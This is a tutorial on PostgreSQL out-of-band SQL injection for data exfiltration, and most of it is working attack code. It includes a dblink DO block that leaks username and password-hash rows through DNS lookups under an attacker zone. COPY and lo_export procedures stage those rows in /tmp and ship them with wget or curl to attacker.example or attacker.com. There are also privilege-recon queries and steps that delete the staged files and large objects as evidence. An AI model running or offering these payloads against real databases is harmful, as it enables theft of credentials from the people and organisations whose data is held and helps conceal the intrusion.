PostgreSQL Out of Band

Context

In this article we look at how PostgreSQL Out of Band (OOB) SQL Injection can be used for data exfiltration. Instead of reading query results back through the vulnerable application's responses, the attacker makes the database server itself write the data to its own filesystem or send it over the network to a system the attacker controls. Readers should be familiar with SQL queries, database interactions and HTTP requests.

Theory

Out of Band SQL Injection in PostgreSQL

Out of Band SQL Injection uses a communication path other than the application's own response to get data out of the database. Classic in-band injection relies on the database's direct responses (query output or error messages), and blind injection infers data from boolean or timing differences; Out of Band injection instead makes the database server interact with another system, such as an HTTP server or a DNS resolver, and carries the data inside that interaction. It is the technique of choice when the injection is blind and inference-based extraction is too slow or unreliable.

COPY Command Usage

The COPY command in PostgreSQL transfers data between a table (or a query result) and a file. COPY ... TO '<path>' writes the result to the database server's filesystem as the operating-system user that runs PostgreSQL; it requires superuser privileges or, from PostgreSQL 11, membership in the pg_write_server_files role. Through SQL Injection this can be misused to dump query results to a file on the server, which the attacker then retrieves: either because the path is served to the outside (for example a web root on the same host) or by shipping the file from the server with a second statement, COPY ... TO PROGRAM or COPY ... FROM PROGRAM, which runs a shell command on the database host (superuser or pg_execute_server_program).

lo_export Functionality

lo_export is a PostgreSQL function that writes the contents of a large object to a file on the server's filesystem; like COPY ... TO, it runs as the PostgreSQL operating-system user and is restricted to superusers by default. It only exports existing large objects, so to exfiltrate ordinary table data the attacker first packs the query result into a large object with lo_from_bytea (PostgreSQL 9.4+) or lo_import, and then exports it. Because it writes raw bytes rather than COPY's text or CSV formatting, it is convenient for binary content and for data that COPY's formatting would mangle.

Out of Band Communication Mechanisms

Out of Band exfiltration proper uses a network protocol to carry data from the database host to a remote, attacker-controlled server, by making the database issue HTTP or DNS requests whose body, URL or hostname contains the data. HTTP offers the most capacity (a whole file in one request) but needs outbound access from the database host to the attacker's server; DNS works even through restrictive egress filtering, because the lookup is forwarded by the organisation's own resolver, at the cost of squeezing the data into hostname labels of at most 63 characters each. Checking the server's outbound connectivity is the first step in choosing the channel.
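The DNS channel described above, as an added example that is not part of the original article. It relies on the dblink extension: dblink_connect has to resolve the hostname in its connection string before it can fail to connect, so a query result encoded into that hostname reaches the attacker's authoritative DNS server even though no PostgreSQL connection is ever established. The users table, the oob.attacker.example zone and the user/password values are assumptions; dblink must be installed (CREATE EXTENSION dblink), and the DO block is a stacked statement, so the injection point must allow more than one statement.

```sql
-- Added example, not from the original article. DNS exfiltration through
-- dblink: libpq resolves the host in the connection string before it tries
-- to connect, so the lookup for <seq>-<total>.<hex chunk>.oob.attacker.example
-- reaches the attacker's DNS server whether or not a connection follows.
-- Assumptions (hypothetical): table users(username, password_hash), zone
-- oob.attacker.example under attacker control, extension dblink installed.
DO $$
DECLARE
    hex   text;
    total int;
BEGIN
    -- Hex-encode the rows: hostname labels should only contain [0-9a-z-],
    -- and hex is trivial to reverse on the resolver side.
    SELECT encode(convert_to(string_agg(username || ':' || password_hash, E'\n'),
                             'UTF8'), 'hex')
      INTO hex
      FROM users;
    IF hex IS NULL THEN
        RETURN;                       -- nothing to send
    END IF;

    -- A DNS label is at most 63 bytes, so send 60-character chunks, each
    -- prefixed with "<seq>-<total>" so the receiver can reorder them.
    total := ceil(length(hex) / 60.0);
    FOR n IN 1 .. total LOOP
        BEGIN
            -- password= is mandatory in dblink connection strings for
            -- non-superusers; connect_timeout keeps each attempt short.
            PERFORM dblink_connect(
                'host=' || n || '-' || total || '.'
                        || substr(hex, (n - 1) * 60 + 1, 60)
                        || '.oob.attacker.example'
                        || ' user=x password=x connect_timeout=2');
            PERFORM dblink_disconnect();   -- only reached if something answered
        EXCEPTION WHEN OTHERS THEN
            -- The connection is expected to fail (NXDOMAIN or refused);
            -- the lookup has already fired, so swallow the error and go on.
            NULL;
        END;
    END LOOP;
END $$;
```

On the receiving side, the authoritative server for oob.attacker.example logs each queried name; stripping the zone suffix, sorting the labels by their sequence number and hex-decoding the concatenated chunks recovers the original rows.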

Practice

Exfiltrate Data Using COPY Command

To exfiltrate data using the COPY command, follow these steps. The session obtained through the injection must be a superuser or hold the pg_write_server_files and pg_execute_server_program roles:

  • Write the selected data to a file on the database server. FORMAT csv matches the file name and keeps the output easy to parse:

    COPY (SELECT column FROM table) TO '/tmp/exfiltrated_data.csv' WITH (FORMAT csv);
    
  • Send the file to an attacker-controlled server using wget. The command has to run on the database host, where the attacker normally has no shell, so it is launched from SQL through COPY ... FROM PROGRAM (or COPY ... TO PROGRAM), which executes it as the PostgreSQL operating-system user:

    wget http://attacker.com/upload --post-file=/tmp/exfiltrated_data.csv
    

The outcome of this technique is that data from the PostgreSQL database is written to a file on the database host and then sent to an external server controlled by the attacker. The file on disk is evidence of the activity and should be removed once it has been transferred.
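The complete COPY procedure run from SQL, as an added example that is not code from the original article, including the privilege checks worth doing before making any noise. The users table, its username and password_hash columns and the collector URL http://attacker.example/upload are assumptions; the role checks need PostgreSQL 11 or later, where the pg_write_server_files and pg_execute_server_program roles exist.

```sql
-- Added example, not from the original article: the full COPY-based
-- procedure executed from SQL. Assumptions (hypothetical): table
-- users(username, password_hash) holds the target data and
-- http://attacker.example/upload accepts HTTP POST bodies.
-- COPY ... TO '<file>' needs superuser or pg_write_server_files (PostgreSQL 11+);
-- COPY ... TO/FROM PROGRAM needs superuser or pg_execute_server_program and
-- runs the command through /bin/sh as the PostgreSQL operating-system user.

-- 1. Confirm what the injected session may do before trying anything.
SELECT current_user,
       rolsuper                                                         AS is_superuser,
       pg_has_role(current_user, 'pg_write_server_files', 'MEMBER')     AS can_write_files,
       pg_has_role(current_user, 'pg_execute_server_program', 'MEMBER') AS can_run_programs
FROM pg_roles
WHERE rolname = current_user;

-- 2. Stage the rows in a server-side file (CSV with a header row, as the
--    file name suggests).
COPY (SELECT username, password_hash FROM users)
  TO '/tmp/exfiltrated_data.csv' WITH (FORMAT csv, HEADER true);

-- 3. Ship the file. COPY ... FROM PROGRAM reads the command's stdout into a
--    table, so a throwaway temp table collects whatever wget prints
--    (stderr is redirected so error messages are captured too).
CREATE TEMP TABLE oob_output (line text);
COPY oob_output FROM PROGRAM
  'wget -q -O - --post-file=/tmp/exfiltrated_data.csv http://attacker.example/upload 2>&1';

-- 4. Inspect the collector's response, then remove the staged file and the
--    temp table; both are evidence.
SELECT line FROM oob_output;
COPY oob_output FROM PROGRAM 'rm -f /tmp/exfiltrated_data.csv';
DROP TABLE oob_output;

-- No-file variant: COPY ... TO PROGRAM writes each row to the command's
-- stdin, so the rows go straight into curl's request body and nothing is
-- written to disk.
COPY (SELECT username || ',' || password_hash FROM users)
  TO PROGRAM 'curl -s --data-binary @- http://attacker.example/upload';
```

The check in step 1 is what decides between the variants: a session that has pg_execute_server_program but not pg_write_server_files can still use the no-file variant, while one with only pg_write_server_files can stage the file but must retrieve it through some other path, such as a directory served over HTTP.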

Exfiltrate Data Using lo_export

To exfiltrate data using lo_export, use the following steps. The session must be a superuser, or have been granted EXECUTE on lo_export:

  • Export large object data to files. Large objects are listed in pg_largeobject_metadata (pg_largeobject itself holds the data pages and has no oid column); exporting each object to its own file avoids every row overwriting the same path:

    SELECT lo_export(oid, '/tmp/exfiltrated_' || oid || '.bin') FROM pg_largeobject_metadata;
    
  • Upload the resulting files to an attacker-controlled server using curl, run on the database host (for example through COPY ... FROM PROGRAM):

    for f in /tmp/exfiltrated_*.bin; do curl -X POST -F "file=@$f" http://attacker.com/upload; done
    

The outcome of this technique is that the large objects stored in the PostgreSQL database are written to files on the database host, which are then uploaded to an external server controlled by the attacker. Ordinary table data can be exfiltrated the same way after packing it into a large object with lo_from_bytea.
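Exfiltrating ordinary table rows through the large-object interface, as an added example that is not code from the original article. lo_export only writes an existing large object, so the rows are first packed into one with lo_from_bytea (PostgreSQL 9.4+), exported, shipped with curl, and the object is unlinked again. The users table, its columns and the collector URL http://attacker.example/upload are assumptions; the DO block is a stacked statement and keeps the new object's OID in a variable so that the export and the cleanup refer to exactly the object that was created.

```sql
-- Added example, not from the original article: exfiltrating table rows via
-- lo_from_bytea + lo_export. Assumptions (hypothetical): table
-- users(username, password_hash), collector http://attacker.example/upload.
-- lo_export needs superuser (or a GRANT on the function); COPY ... TO PROGRAM
-- needs superuser or pg_execute_server_program.

-- Reconnaissance: large objects that already exist, with their owners.
SELECT oid, lomowner::regrole AS owner FROM pg_largeobject_metadata;

DO $$
DECLARE
    blob oid;
BEGIN
    -- Pack the rows as UTF-8 bytes into a new large object; OID 0 lets the
    -- server allocate a free OID, which is returned and kept in blob.
    SELECT lo_from_bytea(0, convert_to(string_agg(username || ':' || password_hash, E'\n'),
                                       'UTF8'))
      INTO blob
      FROM users;
    IF blob IS NULL THEN
        RETURN;                       -- no rows, nothing to export
    END IF;

    -- Write the object to the server filesystem as the PostgreSQL OS user.
    PERFORM lo_export(blob, '/tmp/exfiltrated_data.bin');

    -- Hand the file to curl from inside the database, then delete the file.
    -- COPY ... TO PROGRAM only needs something to write; SELECT 1 will do.
    COPY (SELECT 1) TO PROGRAM
      'curl -s -F "file=@/tmp/exfiltrated_data.bin" http://attacker.example/upload; rm -f /tmp/exfiltrated_data.bin';

    -- Unlink the large object so the copied data does not linger in
    -- pg_largeobject after the engagement.
    PERFORM lo_unlink(blob);
END $$;
```

The reconnaissance query is worth running even when only table data is wanted: pre-existing large objects are often documents or attachments the application stores, and they can be exported with the same lo_export call without the packing step.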

Tools

  • wget
  • curl

These tools send the staged file from the server where PostgreSQL is running to an attacker-controlled endpoint. Because the attacker normally has no interactive shell on that host, they are launched from inside the database through COPY ... FROM PROGRAM or COPY ... TO PROGRAM, and they must actually be installed on the database host; checking for them first (for example by running which wget curl through COPY ... FROM PROGRAM) avoids a noisy failed attempt.
